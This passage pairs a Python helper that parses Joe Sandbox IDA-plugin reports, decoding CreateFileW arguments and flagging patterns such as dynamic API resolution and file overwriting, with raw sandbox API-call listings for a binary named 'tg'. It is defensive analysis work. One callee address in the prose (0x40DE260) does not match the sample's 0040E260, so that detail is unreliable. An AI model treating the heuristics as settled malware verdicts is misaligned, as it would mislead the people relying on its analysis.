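decode CreateFileW arguments and flag API patterns. Added example, not Joe Sandbox code."""
import re
from collections import namedtuple
from dataclasses import dataclass, field

# Real Win32 constants (winnt.h / fileapi.h) used to decode CreateFileW arguments.
GENERIC_ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
                  0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
CREATION_DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                        4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}

# "Api.MODULE(args), ref: 0040AB31", or without arguments "wcslen.MSVCRT ref: 0040E037".
API_RE = re.compile(r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})")
FIELD_RE = re.compile(r"•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")   # "• API ID: ..." etc.

ApiCall = namedtuple("ApiCall", "api module args ref subcall")   # subcall: made by a callee

@dataclass
class FunctionEntry:
    calls: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)   # API ID, String ID, fuzzy hashes, ...

    def direct_apis(self):
        """APIs called by this function itself, excluding those of its callees."""
        return {c.api for c in self.calls if not c.subcall}

def parse_entries(text):
    """Each function entry opens with an 'APIs' heading; split on it and parse."""
    entries, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = FunctionEntry()
            entries.append(current)
        elif current is not None:
            m = API_RE.search(line)
            if m:
                args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
                current.calls.append(ApiCall(m["api"], m["mod"], args, m["ref"].upper(),
                                             "Part of subcall function" in line))
            else:
                f = FIELD_RE.match(line)
                if f:
                    current.fields[f["key"].strip()] = f["val"].strip()
    return entries

def decode_createfile(call):
    """(access, disposition) names from CreateFileW's 2nd and 5th hex arguments."""
    try:
        access, disp = int(call.args[1], 16), int(call.args[4], 16)
    except (IndexError, ValueError):          # "?" means the sandbox did not recover it
        return ("?", "?")
    names = [n for bit, n in GENERIC_ACCESS.items() if access & bit]
    return ("|".join(names) or hex(access), CREATION_DISPOSITION.get(disp, hex(disp)))

def flag_patterns(entry):
    """Heuristic flags (this example's own choices) over the function's APIs and String ID."""
    apis, strings = entry.direct_apis(), entry.fields.get("String ID", "").lower()
    flags = set()
    if apis & {"LoadLibraryA", "LoadLibraryW", "LoadLibraryExW"} and "GetProcAddress" in apis:
        flags.add("dynamic-api-resolution")       # imports resolved by name at run time
    if apis & {"GetTempPathW", "GetTempFileNameW"}:
        flags.add("temp-dir-staging")
    if "sysnative" in strings:
        flags.add("wow64-sysnative-path")         # 32-bit code reaching the real System32
    for c in entry.calls:
        if c.api.startswith("CreateFile") and not c.subcall:
            access, disp = decode_createfile(c)
            if "GENERIC_WRITE" in access and disp in ("CREATE_ALWAYS", "TRUNCATE_EXISTING"):
                flags.add("overwrites-files")
    return flags

def summarize(text):
    """One dict per function entry: own APIs, flags, String ID, decoded CreateFile call sites."""
    return [{"apis": sorted(e.direct_apis()), "flags": sorted(flag_patterns(e)),
             "string_id": e.fields.get("String ID", ""),
             "createfile": [(c.ref,) + decode_createfile(c)
                            for c in e.calls if c.api.startswith("CreateFile")]}
            for e in parse_entries(text)]

# Constructed input: two entries copied from this report, with argument lists shortened.
SAMPLE = """\
APIs
  • Part of subcall function 0040E260: TlsGetValue.KERNEL32(0000000D,00001000), ref: 0040E26C
• GetTempPathW.KERNEL32(00000104,00000000,00000104,00000000,?,?,?,00000000), ref: 0040A76D
• LoadLibraryW.KERNEL32(Kernel32.DLL,?,?,?,00000000,00401A0D), ref: 0040A77A
• GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 0040A78C
• GetLongPathNameW.KERNELBASE(00000000,00000000,00000104,?,?,?,00000000), ref: 0040A799
• FreeLibrary.KERNEL32(00000000,?,?,?,00000000,00401A0D), ref: 0040A79E
• String ID: GetLongPathNameW$Kernel32.DLL
APIs
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 0040AB31
• CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 0040AB72
• CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 0040ABBC
• CreateFileW.KERNEL32(?,40000000,?,00000000,00000005,00000000,00000000), ref: 0040ABDE
• HeapAlloc.KERNEL32(00000000,00001000,?,?,?,?,00000000,00000000), ref: 0040AC17
• SetFilePointer.KERNEL32(?,00000000,?,00000002), ref: 0040AC6A
• API ID: File$Create$AllocHeapPointer
• String ID:
"""
```

Run `summarize(SAMPLE)` on the constructed input: the first entry reports LoadLibraryW together with GetProcAddress (the resolver pattern) and GetTempPathW, and TlsGetValue is excluded because it belongs to the callee at 0x40DE260; the second entry decodes the four CreateFileW sites as OPEN_EXISTING read, OPEN_ALWAYS read/write, CREATE_ALWAYS read/write and TRUNCATE_EXISTING write, which is why it gets the overwrite flag. Feeding the whole report text to the same function is fine; only the "APIs" heading and the bullet lines are relied on, and the fuzzy hashes end up in `fields` for cross-report matching.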

                                      Control-flow Graph (rendered graph not reproduced; legend: executed / not executed)
                                      Function 0x40D819-0x40D943: EnterCriticalSection at 0x40D855, HeapAlloc at 0x40D887, a recursive call to 0x40D819 at 0x40D89D and LeaveCriticalSection at 0x40D8E5, plus a separate path through RtlAllocateHeap at 0x40D8F2 and InitializeCriticalSection at 0x40D930.
                                      APIs
                                      • EnterCriticalSection.KERNEL32(00418624,0041861C,0040D9E2,00000000,FFFFFFED,00000200,76ED5E70,00409E76,FFFFFFED,00000010,00010000,00000004,00000200), ref: 0040D85A
                                      • HeapAlloc.KERNEL32(00000000,00000018,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 0040D891
                                      • LeaveCriticalSection.KERNEL32(00418624,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040D8EA
                                      • RtlAllocateHeap.NTDLL(00000000,00000038,00000000,FFFFFFED,00000200,76ED5E70,00409E76,FFFFFFED,00000010,00010000,00000004,00000200), ref: 0040D8FB
                                      • InitializeCriticalSection.KERNEL32(00000020,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040D937
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: CriticalSection$Heap$AllocAllocateEnterInitializeLeave
                                      • String ID:
                                      • API String ID: 1272335518-0
                                      • Opcode ID: f6530bd1139fc1308a1eb69ae95df56e95dab55b3f4bf4e911806d1cb07516e8
                                      • Instruction ID: b7a84fb5e76b6252515cea3da09f74f38e7866411a6d0cfbb28ace0a8fd55691
                                      • Opcode Fuzzy Hash: f6530bd1139fc1308a1eb69ae95df56e95dab55b3f4bf4e911806d1cb07516e8
                                      • Instruction Fuzzy Hash: 7B31AEB2E007069FC3209F95D844A56BBF5FB44714B15C67EE465A77A0CB38E908CF98

                                      Control-flow Graph (graph image not captured): function 40a96c
                                      APIs
                                      • SHGetFolderLocation.SHELL32(00000000,008C8F58,00000000,00000000,00000000,00000000,00000000,?,00000104,0040A91B,00000000,00000000,00000104,?), ref: 0040A97E
                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0040A98F
                                      • wcslen.MSVCRT ref: 0040A99A
                                      • CoTaskMemFree.OLE32(00000000,?,00000104,0040A91B,00000000,00000000,00000104,?,?,?,?,00000009,00403791,00000001,00000000,00000000), ref: 0040A9B8
                                      Similarity
                                      • API ID: FolderFreeFromListLocationPathTaskwcslen
                                      • String ID:
                                      • API String ID: 4012708801-0
                                      • Opcode ID: 19b4b104c0b63c733be71c6c9fc4bbe8097ebb7fbe2648ca0bea1f237fe466b4
                                      • Instruction ID: 15676ea375ba95ce47a4ad1d62f3a4f85f84cc5ccd71b7d74cdbb22097095955
                                      • Opcode Fuzzy Hash: 19b4b104c0b63c733be71c6c9fc4bbe8097ebb7fbe2648ca0bea1f237fe466b4
                                      • Instruction Fuzzy Hash: 51F0D136610614BAC7205B6ADD08DAB7B78EF06660B414126F805E6250E7308920C7E5

                                      Control-flow Graph (graph image not captured): function 402022
                                      APIs
                                      • ShellExecuteExW.SHELL32(?), ref: 004020A7
                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 004020C6
                                      Strings
                                      Similarity
                                      • API ID: CodeExecuteExitProcessShell
                                      • String ID: open
                                      • API String ID: 1016612177-2758837156
                                      • Opcode ID: 4fb2f0ec770fda151a68555488377ed97fba283763a87ea546f97f21bf454217
                                      • Instruction ID: 2b8263a944a9b57d4591781c670f1b736d97a98816e9e989756960c1ab26e777
                                      • Opcode Fuzzy Hash: 4fb2f0ec770fda151a68555488377ed97fba283763a87ea546f97f21bf454217
                                      • Instruction Fuzzy Hash: 66219D71008309AFD700EF54C855A9FBBE8EF44304F10882EF299E2291DB79D909CF96

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 0040DFC0: TlsGetValue.KERNEL32(0000000D,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004,00000000,00417070,00000008,0000000C), ref: 0040DFD7
                                        • Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
                                        • Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
                                        • Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB
                                        • Part of subcall function 00409698: GetModuleFileNameW.KERNEL32(00000000,00000104,00000104,00000000,?,?,?,00401BC5,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000), ref: 004096B4
                                        • Part of subcall function 00409698: wcscmp.MSVCRT ref: 004096C2
                                        • Part of subcall function 00409698: memmove.MSVCRT(00000000,00000008,\\?\,?,?,?,00401BC5,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000), ref: 004096DA
                                        • Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402FDE,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189
                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040118B,00418048,00000000), ref: 00401BCD
                                      • EnumResourceTypesW.KERNEL32(00000000,00000000,00000000), ref: 00401BEA
                                      • FreeLibrary.KERNEL32(?,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040118B,00418048), ref: 00401BF2
                                        • Part of subcall function 0040E020: wcslen.MSVCRT ref: 0040E037
                                        • Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
                                        • Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(008C0000,00000000,?), ref: 0040DEF9
                                      Similarity
                                      • API ID: Value$ErrorLastLibrary$AllocateEnumFileFreeHeapLoadModuleNameResourceTypesmemmovewcscmpwcslen
                                      • String ID:
                                      • API String ID: 983379767-0
                                      • Opcode ID: ea458f1c63abfdf06fd90357c43bf09d830a84b369ce573894b611d230e9b04f
                                      • Instruction ID: 657320b8a0b9e8c73ad23a805e8a4a11547555e009ba7fb8d64ba55fc2021fd8
                                      • Opcode Fuzzy Hash: ea458f1c63abfdf06fd90357c43bf09d830a84b369ce573894b611d230e9b04f
                                      • Instruction Fuzzy Hash: 22514AB59047007AE2007BB2DD82E7F66AEDBD4709F10893FF944790D2C93C984996AE

                                      Control-flow Graph (graph image not captured): function 40b020
                                      APIs
                                      • SetFilePointer.KERNELBASE(?,?,?,00000001), ref: 0040B058
                                      • memcpy.MSVCRT(?,?,?,?,00000001), ref: 0040B092
                                      Similarity
                                      • API ID: FilePointermemcpy
                                      • String ID:
                                      • API String ID: 1104741977-0
                                      • Opcode ID: 01662b736399dd0210b3166c1eac24a2b1f7f8f1802043f53fe0b6834fe756e1
                                      • Instruction ID: 223037c69186752c1411635bf46ae5d03fa463101b4e1ddb65380de8071f5603
                                      • Opcode Fuzzy Hash: 01662b736399dd0210b3166c1eac24a2b1f7f8f1802043f53fe0b6834fe756e1
                                      • Instruction Fuzzy Hash: 93313A392047019FC320DF29D844E5BB7E1EFD4314F04882EE59A97750D335E919CBA6

                                      Control-flow Graph (graph image not captured): function 40dec0
                                      APIs
                                      • TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
                                      • RtlAllocateHeap.NTDLL(008C0000,00000000,?), ref: 0040DEF9
                                      • RtlReAllocateHeap.NTDLL(008C0000,00000000,?,?), ref: 0040DF1C
                                      Similarity
                                      • API ID: AllocateHeap$Value
                                      • String ID:
                                      • API String ID: 2497967046-0
                                      • Opcode ID: 391403ca008f830686c32838620f38fbd141f2e22e04a7bef1baef16fc724d55
                                      • Instruction ID: 93a72ebc0765164a1c418c05f64e83f02c193a946cd328b9657e87a1490d81f0
                                      • Opcode Fuzzy Hash: 391403ca008f830686c32838620f38fbd141f2e22e04a7bef1baef16fc724d55
                                      • Instruction Fuzzy Hash: F111B974A00208EFCB04DF98D894E9ABBB6FF88314F20C159F9099B355D735AA41DB94

                                      Control-flow Graph (graph image not captured): function 40a6c5
                                      APIs
                                      Similarity
                                      • API ID: CreateDirectorywcslenwcsncpy
                                      • String ID:
                                      • API String ID: 961886536-0
                                      • Opcode ID: cc8a7ec8d54b194b434c4abf9ee5240936a68a416eca0cc9abdb5220f9513762
                                      • Instruction ID: 5eb92d4f139d310a1ce384b3b75a423d404f976685da56e70024377017fd7883
                                      • Opcode Fuzzy Hash: cc8a7ec8d54b194b434c4abf9ee5240936a68a416eca0cc9abdb5220f9513762
                                      • Instruction Fuzzy Hash: 3E0167B180131896CB24DB64CC8DEBA73B8DF04304F6086BBE415E71D1E779DAA4DB5A

                                      Control-flow Graph (graph image not captured): function 408dee
                                      APIs
                                      • memset.MSVCRT ref: 00408DFB
                                      • InitCommonControlsEx.COMCTL32(00000008,00001000), ref: 00408E15
                                      • CoInitialize.OLE32(00000000), ref: 00408E1D
                                      Similarity
                                      • API ID: CommonControlsInitInitializememset
                                      • String ID:
                                      • API String ID: 2179856907-0
                                      • Opcode ID: 91c7401402fa2f0ea5928b71181181df8ef358baa4c0a6ad788b24867e7e8746
                                      • Instruction ID: d18f3e268914b4fee2ab689e9e6bda8f6ab82eec5aee9dd7765ec6ce908ab83c
                                      • Opcode Fuzzy Hash: 91c7401402fa2f0ea5928b71181181df8ef358baa4c0a6ad788b24867e7e8746
                                      • Instruction Fuzzy Hash: 12E08CB088430CBBEB009BD0DC0EF8DBB7CEB00315F0041A4F904A2280EBB466488B95
                                      APIs
                                      • SetEnvironmentVariableW.KERNELBASE(008C8F58,008C8F58,00404434,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004098D9
                                      Strings
                                      Similarity
                                      • API ID: EnvironmentVariable
                                      • String ID: $0A
                                      • API String ID: 1431749950-513306843
                                      • Opcode ID: 1c567db1f8ae5e831e25467e71350c4bb5df89e506d1786ab4261c5f7a60237e
                                      • Instruction ID: a83057451cf148fd94e5dae0918d05dd15dd477b401c26288c9a060c20ad275f
                                      • Opcode Fuzzy Hash: 1c567db1f8ae5e831e25467e71350c4bb5df89e506d1786ab4261c5f7a60237e
                                      • Instruction Fuzzy Hash: E7C01231619201BBD710EA14C904B57BBE5EB50345F04C439B044912B0C338CC44D705
                                      APIs
                                        • Part of subcall function 0040D498: EnterCriticalSection.KERNEL32(00000020,00000000,?,00000000,0040ADD5,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?,00000000), ref: 0040D4A3
                                        • Part of subcall function 0040D498: LeaveCriticalSection.KERNEL32(00000020,?,00000000,0040ADD5,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0040D51E
                                      • CreateFileW.KERNELBASE(00000000,80000000,00000000,00000000,00000003,00000080,00000000,?,00000000,?,?,00000000,004033A4,00000000,00000000,00000000), ref: 0040ADF3
                                      • HeapAlloc.KERNEL32(00000000,00001000,?,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?,00000000,00000000,00000800), ref: 0040AE15
                                      Similarity
                                      • API ID: CriticalSection$AllocCreateEnterFileHeapLeave
                                      • String ID:
                                      • API String ID: 3705299215-0
                                      • Opcode ID: e305dac00e43d1f01632c500e63f0068ba79cd60e0177f680cb6723e5d67acda
                                      • Instruction ID: 12139a0eb1477c71ece9156acb4b07c5ee84e209973367f4cf7a68f803bf58ce
                                      • Opcode Fuzzy Hash: e305dac00e43d1f01632c500e63f0068ba79cd60e0177f680cb6723e5d67acda
                                      • Instruction Fuzzy Hash: C1119331140300ABC2305F1AEC44B57BBF9EB85764F14863EF5A5A73E0C7759C158BA9
                                      APIs
                                        • Part of subcall function 0040DD1D: HeapFree.KERNEL32(00000000,-00000018,00000200,00000000,0040DBDB,00000200,?,?,?,0040112D,0000000C,000186A1,00000007,00417080,00418098,00000004), ref: 0040DD5E
                                      • RtlAllocateHeap.NTDLL(00000000,FFFFFFDD,?,00000200,?,?,?,0040112D,0000000C,000186A1,00000007,00417080,00418098,00000004,00000000,00417070), ref: 0040DBFA
                                      • memset.MSVCRT ref: 0040DC35
                                      Similarity
                                      • API ID: Heap$AllocateFreememset
                                      • String ID:
                                      • API String ID: 2774703448-0
                                      • Opcode ID: 5a98dcc60eb41190d4dd3f8e51887e861c9e07386c3483abd70395c86239bf10
                                      • Instruction ID: c1bdd2e89517895a38d7a8cc2bcc280f97e8981c2924b00dcd90f9207400bfe8
                                      • Opcode Fuzzy Hash: 5a98dcc60eb41190d4dd3f8e51887e861c9e07386c3483abd70395c86239bf10
                                      • Instruction Fuzzy Hash: E51167729043149BC320DF59DC80A8BBBE8EF88B10F01492EB988A7351D774E804CBA5
                                      APIs
                                      • HeapCreate.KERNELBASE(00000000,00001000,00000000,?,00401053,00000000,00001000,00000000,00000000), ref: 0040DE3C
                                      • TlsAlloc.KERNEL32(?,00401053,00000000,00001000,00000000,00000000), ref: 0040DE47
                                        • Part of subcall function 0040E6A0: HeapAlloc.KERNEL32(008C0000,00000000,0000000C,?,?,0040DE57,?,00401053,00000000,00001000,00000000,00000000), ref: 0040E6AE
                                        • Part of subcall function 0040E6A0: HeapAlloc.KERNEL32(008C0000,00000000,00000010,?,?,0040DE57,?,00401053,00000000,00001000,00000000,00000000), ref: 0040E6C2
                                        • Part of subcall function 0040E6A0: TlsSetValue.KERNEL32(0000000D,00000000,?,?,0040DE57,?,00401053,00000000,00001000,00000000,00000000), ref: 0040E6EB
                                      Similarity
                                      • API ID: AllocHeap$CreateValue
                                      • String ID:
                                      • API String ID: 493873155-0
                                      • Opcode ID: f31918e335419563cb91e7816fe34751be6fcb3fb2708b1ef5dadcb8cb13decf
                                      • Instruction ID: f6fb69b35e6ce2edff263c55ffd8902d3e18a9f91630c6f11d167ca4d15ccc07
                                      • Opcode Fuzzy Hash: f31918e335419563cb91e7816fe34751be6fcb3fb2708b1ef5dadcb8cb13decf
                                      • Instruction Fuzzy Hash: 4ED012309C8304ABE7402FB1BC0A7843B789708765F604835F509572D1D9BA6090495C
                                      APIs
                                      • SetFileAttributesW.KERNEL32(00000002,00000080,0040A7F2,008C8F58,00000000,00401FDF,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000), ref: 0040A7D0
                                      • DeleteFileW.KERNELBASE(00000000,0040A7F2,008C8F58,00000000,00401FDF,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 0040A7DA
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: File$AttributesDelete
                                      • String ID:
                                      • API String ID: 2910425767-0
                                      • Opcode ID: d362f7088f03a7c0c281f2bbae1f9f88548ac7f83f4d98d140da13098a0d0c91
                                      • Instruction ID: f7dd43ce8ab679ab9acf2fbd66ade7664d9bbbd5be98dbe0a51a073a4b2bc51f
                                      • Opcode Fuzzy Hash: d362f7088f03a7c0c281f2bbae1f9f88548ac7f83f4d98d140da13098a0d0c91
                                      • Instruction Fuzzy Hash: 00D09E30408300B6D7555B20C90D75ABAF17F84745F14C43AF485514F1D7798C65E70A
                                      APIs
                                      • HeapFree.KERNEL32(00000000,?,00000000,00000000,?,?,004033E8,00000000,00000000,00000800,00000000,00000000,00000000,00000000,?,00000000), ref: 0040AA13
                                      • CloseHandle.KERNELBASE(00000000,00000000,?,?,004033E8,00000000,00000000,00000800,00000000,00000000,00000000,00000000,?,00000000,00000000,00000800), ref: 0040AA1B
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: CloseFreeHandleHeap
                                      • String ID:
                                      • API String ID: 1642312469-0
                                      • Opcode ID: 579ea7bb730054d1301fd9c1686cb7efab9d423d292c410d1af4f5f5553bf1d6
                                      • Instruction ID: 9ff7f62518d4b0577bac71a3516b051fbd3d19e36237879e48dc57cbe5217eec
                                      • Opcode Fuzzy Hash: 579ea7bb730054d1301fd9c1686cb7efab9d423d292c410d1af4f5f5553bf1d6
                                      • Instruction Fuzzy Hash: E0F05E32600200A7CA216B5AED05A8BBBB2EB85764B11853EF124314F5CB355860DB5D
                                      APIs
                                        • Part of subcall function 0040DFC0: TlsGetValue.KERNEL32(0000000D,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004,00000000,00417070,00000008,0000000C), ref: 0040DFD7
                                        • Part of subcall function 00409BA0: RtlAllocateHeap.NTDLL(00000008,00000000,00402F00,00000200,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,0040439A,00000000,00000000,00000000), ref: 00409BB1
                                      • GetShortPathNameW.KERNEL32(008C8F58,008C8F58,00002710), ref: 00402C34
                                        • Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
                                        • Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
                                        • Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB
                                        • Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
                                        • Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(008C0000,00000000,?), ref: 0040DEF9
                                        • Part of subcall function 00409B80: HeapFree.KERNEL32(00000000,00000000,00401B6B,00000000,00000000,?,00000000,00000000,00417024,00000000,00000000,?,00000000,?,00000000,00000000), ref: 00409B8C
                                        • Part of subcall function 0040E020: wcslen.MSVCRT ref: 0040E037
                                        • Part of subcall function 00405170: TlsGetValue.KERNEL32(?,?,00402FED,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000), ref: 00405178
                                        • Part of subcall function 0040DF50: HeapFree.KERNEL32(008C0000,00000000,00000000,?,00000000,?,00411DE4,00000000,00000000,-00000008), ref: 0040DF68
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: HeapValue$AllocateErrorFreeLast$NamePathShortwcslen
                                      • String ID:
                                      • API String ID: 192546213-0
                                      • Opcode ID: 1f36478916e75dc19802576b6717a84d5ffab4db83f33051ef68578c82d7535e
                                      • Instruction ID: 7a2999830b1481a9d7ef80217fec4737815e267699ad494388d5f61b71452053
                                      • Opcode Fuzzy Hash: 1f36478916e75dc19802576b6717a84d5ffab4db83f33051ef68578c82d7535e
                                      • Instruction Fuzzy Hash: F6012D75508201BAE5007BA1DD06D3F76A9EFD0718F10CD3EB944B50E2CA3D9C599A5E
                                      APIs
                                      • WriteFile.KERNELBASE(00000000,?,?,00000000,00000000,00000000,?,0040AA08,00000000,00000000,?,?,004033E8,00000000,00000000,00000800), ref: 0040AA67
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: FileWrite
                                      • String ID:
                                      • API String ID: 3934441357-0
                                      • Opcode ID: da5ca93210413f8561433c219da2a3ea233fc89f057aa1d005b42788aa018882
                                      • Instruction ID: b59f1f917ceac4f5cea587e7357412edb8aff685aadda2d04846933fd6210d73
                                      • Opcode Fuzzy Hash: da5ca93210413f8561433c219da2a3ea233fc89f057aa1d005b42788aa018882
                                      • Instruction Fuzzy Hash: 0AF09276105700AFD720DF58D948F97BBE8EB58721F10C82EE69AD3690C770E850DB61
                                      APIs
                                      • GetNativeSystemInfo.KERNEL32(00000000,?,00000000,00000000), ref: 00402BDD
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: InfoNativeSystem
                                      • String ID:
                                      • API String ID: 1721193555-0
                                      • Opcode ID: f8bc963d6c34cd4fcee6a9003d89fae8e3dd4710dd3c612eeb78866044324f60
                                      • Instruction ID: e96e1892c4c724b03879bd5233d00e0abab71770c233aa8573b83279bd435b66
                                      • Opcode Fuzzy Hash: f8bc963d6c34cd4fcee6a9003d89fae8e3dd4710dd3c612eeb78866044324f60
                                      • Instruction Fuzzy Hash: E6D0126081824986D750BE65850979BB3ECE700304F60883AD085561C1F7BCE9D99657
                                      APIs
                                      • RtlAllocateHeap.NTDLL(00000008,00000000,00402F00,00000200,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,0040439A,00000000,00000000,00000000), ref: 00409BB1
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: AllocateHeap
